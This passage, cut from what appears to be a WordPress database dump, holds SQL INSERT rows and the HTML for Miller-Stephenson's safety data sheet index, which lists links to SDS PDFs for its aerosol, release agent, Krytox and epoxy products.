8990</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/862.pdf">EPON RESIN 862</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/560.pdf">MS-560</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/767.pdf">MS-767</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143XD2.pdf">MS-143XD-2</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NRT8906A.pdf">NRT 8906A</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/872.pdf">EPON RESIN 872</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/580.pdf">MS-580</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/772.pdf">MS-772</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143XD25.pdf">MS-143XD-2.5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NRT8908.pdf">NRT 8908</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1001F.pdf">EPON RESIN 1001F</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/700.pdf">MS-700</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/777.pdf">MS-777</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143XD5.pdf">MS-143XD-5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NRT8950.pdf">NRT 8950</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1002F.pdf">EPON RESIN 1002F</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/700.pdf">MS-700M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/782.pdf">MS-782</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143XD10.pdf">MS-143XD-10</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NRT8980.pdf">NRT 8980</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1004F.pdf">EPON RESIN 1004F</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/720.pdf">MS-720</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/787.pdf">MS-787</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/145W.pdf">MS-145W</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NRTgrease.pdf">NRT GREASE</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1007F.pdf">EPON RESIN 1007F</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/720.pdf">MS-720M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/797.pdf">MS-797</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/145W4.pdf">MS-145W-4</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/PFPEoilsXP.pdf">PFPE OIL W/SOLUBLE ADDITIVE</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1031.pdf">EPON RESIN 1031</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/720L.pdf">MS-720L</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/110XB.pdf">MS-110XB</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/153BN.pdf">MS-153BN</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PFPE-Grease-with-Soluble-Additive.pdf">pfpe-grease-with-soluble-additive</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1050.pdf">EPON RESIN 1050</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/725.pdf">MS-725</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1010.pdf">MS-1010</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/A0305B.pdf">A0305B</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/10X.pdf">PFPE Oils</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1163.pdf">EPON RESIN 1163</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/725.pdf">MS-725M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/2010.pdf">MS-2010</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K1206A.pdf">K1206A</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/TS4.pdf">TS4 SEALANT</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/8021.pdf">EPON RESIN 8021</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/730.pdf">MS-730</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2017/02/3100MD-3170MD-16.pdf">MS-31XXMD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/Y0717A.pdf">Y0717A</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/VPF.pdf">VACUUM PUMP FLUID</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/8132.pdf">EPON RESIN 8132</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/730.pdf">MS-730M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3200MD.pdf">MS-32XXMD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NRT960.pdf">Vydax NRT 960</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/VPFXP.pdf">VACUUM PUMP FLUID XP</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/8280.pdf">EPON RESIN 8280</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/730L.pdf">MS-730L</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XP35.pdf">X-P35</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/RAIPA5.pdf">RA/IPA-5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XHT500AF.pdf">XHT-500AF</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/8281.pdf">EPON RESIN 8281</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/738.pdf">MS-738</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/H0805B.pdf">H0805B</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/RAIPA15.pdf">RA/IPA-15</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XHToils.pdf">XHT-OILS</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/58005.pdf">EPON RESIN 58005</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/738.pdf">MS-738M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/H1112B.pdf">H1112B</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/RAIPA.pdf">DryFilm RA/IPA</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XHTAC.pdf">XHT-AC, ACX</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/58034.pdf">EPON RESIN 58034</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/745.pdf">MS-745</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/VertrelSDG.pdf">Vertrel SDG</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/RA.pdf">DryFilm RA</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/XHT-BD-series.pdf">XHT BD, BDZ, BDX</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1510.pdf">EPONEX 1510</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/750.pdf">MS-750</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/VertrelSFR.pdf">Vertrel SFR</a></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-RED-16.pdf">MS-143TE Red</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XHTS.pdf">XHT-S, SX, SZ</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/WD510.pdf">EPI-REZ WD-510</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/750.pdf">MS-750M</a></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/12/485G-16.pdf">MS-48G RFI Nickel</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-1.0-16.pdf">MS-143TE-1.0</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL2E.pdf">GPL 2E SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3522W60.pdf">EPI-REZ 3522-W-60</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/755.pdf">MS-755</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/114D-17.pdf">MS-114D </a></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-2.0-16.pdf">MS-143TE-2.0</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/fluoroguard.pdf">PCA,PRO,SG</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/5003W55.pdf">EPI-REZ 5003-W-55</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/755.pdf">MS-755M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-2.5-16.pdf">MS-143TE-2.5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/5520W60.pdf">EPI-REZ 5520-W-60</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/755L.pdf">MS-755L</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-5-16.pdf">MS-143TE-5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/5522WY55.pdf">EPI-REZ 5522-WY-55</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/760.pdf">MS-760</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-10-16.pdf">MS-143TE-10</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3015.pdf">EPIKURE 3015</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/760.pdf">MS-760M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-82-16.pdf">ReleaSys 82</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3046.pdf">EPIKURE 3046</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/765.pdf">MS-765</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-85-16.pdf">ReleaSys 85</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3055.pdf">EPIKURE 3055</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/770.pdf">MS-770</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-88-16.pdf">ReleaSys 88</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3115.pdf">EPIKURE 3115</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/770.pdf">MS-770M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-89-16.pdf">ReleaSys 89</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2017/04/3125.pdf">EPIKURE 3125</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/775.pdf">MS-775</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8200-16.pdf">ReleaSys 8200</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/3140-1.pdf">EPIKURE 3140</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/775.pdf">MS-775M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8500-16.pdf">ReleaSys 8500</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3155.pdf">EPIKURE 3155</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/780.pdf">MS-780</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8800-16.pdf">ReleaSys 8800</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3164.pdf">EPIKURE 3164</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/780.pdf">MS-780M</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8900-16.pdf">ReleaSys 8900</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3223.pdf">EPIKURE 3223</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/795.pdf">MS-795</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/122AVL-16.pdf">MS-122AVL</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3234.pdf">EPIKURE 3234</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/795.pdf">MS-795M</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/122SEL-16.pdf">MS-122SEL</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3245.pdf">EPIKURE 3245</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/110XN-16.pdf">MS-110XN</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-BLUE-16.pdf">MS-143TE Blue</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3253.pdf">EPIKURE 3253</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/120X.pdf">MS-120X</a></td>\r\n<td></td>\r\n<td style="text-align: center;"></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3270.pdf">EPIKURE 3270</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/120XXP.pdf">MS-120X-XP</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3271.pdf">EPIKURE 3271</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/H0805A.pdf">H0805A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3274.pdf">EPIKURE 3274</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/J0912A.pdf">J0912A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3282.pdf">EPIKURE 3282</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K0725A.pdf">K0725A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3290.pdf">EPIKURE 3290</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K1016A.pdf">K1016A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3295.pdf">EPIKURE 3295</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2017/01/530N-17.pdf">MS-530N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/W.pdf">CURING AGENT W</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/532N-16.pdf">MS-532N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K54.pdf">ANCAMINE K54</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2017/01/538N-17.pdf">MS-538N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K61B.pdf">ANCAMINE K61B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/539N-16.pdf">MS-539N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/BDMA.pdf">BDMA</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/550N-16.pdf">MS-550N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/BF3400.PDF">BF3-400</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/552N-16.pdf">MS-552N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/DEAPA.pdf">DEAPA</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/580N-16.pdf">MS-580N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NMA.pdf">NMA</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/582N-16.pdf">MS-582N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V115.pdf">VERSAMID 115</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/12/747-16.pdf">MS-747</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V125.pdf">VERSAMID 125</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V140.pdf">VERSAMID 140</a></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'SDS', '', 'inherit', 'closed', 'closed', '', '1842-revision-v1', '', '', '2017-06-15 14:52:50', '2017-06-15 14:52:50', '', 1842, 'https://www.miller-stephenson.com/1842-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4575, 317, '2017-06-15 14:54:46', '2017-06-15 14:54:46', '', '124h-15', '', 'inherit', 'closed', 'closed', '', '124h-15', '', '', '2017-06-15 14:54:46', '2017-06-15 14:54:46', '', 1842, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/124H-15.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (4576, 317, '2017-06-15 14:56:01', '2017-06-15 14:56:01', '<h1>Miller-Stephenson SDS database.</h1>\r\nIf you are unable to locate the specific SDS you need, please contact our Technical Support at support@mschem.com or 203-743-4447 (8-4 E.T.)\r\n<table width="1119">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="219"><strong>Aerosol</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Liquid</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Release Agents</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Conformal Coatings</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Krytox</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Epoxy</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/124H-15.pdf">MS-124H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/111.pdf">MS-111</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122AD.pdf">MS-122AD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/452N.pdf">MS-452N</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AGL683.pdf">AGL 683</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/900.pdf">MS-900</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222L.pdf">MS-222L</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/114C.pdf">MS-114C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122ADRED.pdf">MS-122AD RED</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/460H.pdf">MS-460H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AT.pdf">AT</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/905A.pdf">MS-905 Part A</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222N.pdf">MS-222N</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/115.pdf">MS-115</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122ADL.pdf">MS-122ADL</a></td>\r\n<td style="text-align: center;"><a 